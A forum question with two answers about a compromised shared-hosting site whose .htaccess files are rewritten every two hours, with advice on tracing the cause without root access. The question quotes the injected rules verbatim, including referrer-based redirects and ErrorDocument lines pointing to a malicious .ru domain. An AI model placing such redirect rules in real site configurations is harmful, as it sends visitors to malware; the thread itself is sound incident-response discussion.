shared hosting with malware, .htaccess file gets modified every 2 hours or so

I spent all day today chasing malware on the shared hosting for one of my clients.

The issue is as follows: Every 2 hours or so .htaccess file and all other .htaccess files gets modified, on the top of the file these lines are added:

IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://pasla-ghwoo.ru/rqpgfap?8 [R=301,L]
</IfModule>

and on the bottom:

ErrorDocument 400 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 401 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 403 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 404 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 500 http://pasla-ghwoo.ru/rqpgfap?8

The main problem I'm not root on the server, and cannot sudo, as this is shared hosting with 100's of websites. Typical good commands like dmesg, lsof, dtrace, chattr and many others are not available to me as I'm not root.

I can't find who is modifying .htaccess files, how do I get that info? My guess is some php script is changing that which is called from outside via command and control.

This seems to relate to this: http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/

How do I find out who is modifying .htaccess files without being root?


Solution 1:

Without root, or access to diagnostic tools you'd be beating your head against the wall. You could grep through files looking for that .ru to see if it's something under your control.

There are tools you could take a shot in the dark and try: inotify, lsof (not likely) - or simply chowning the .htaccess file to not be writable by Apache (if possible). If it's every two hours, look at crontab as well.

In the end, something's still buggered and you should probably refer to this: How do I deal with a compromised server?

Solution 2:

You should first of all also ask your hosting provider for help, they would want to know that one of the webs they host has been hacked. It is possible that the entire server is compromised. In that case, it would be your provider's responsibility to transfer your website to another, secure server so they can analyze, clean up and reinstall.

In any case, you should ask them to correlate the date/time of the modified .htaccess file with any kind of logs they have: access.log, auth.log, FTP server log etc.

Also, it can be useful to compare the files in your web with a recent backup so you can see what else has been modified.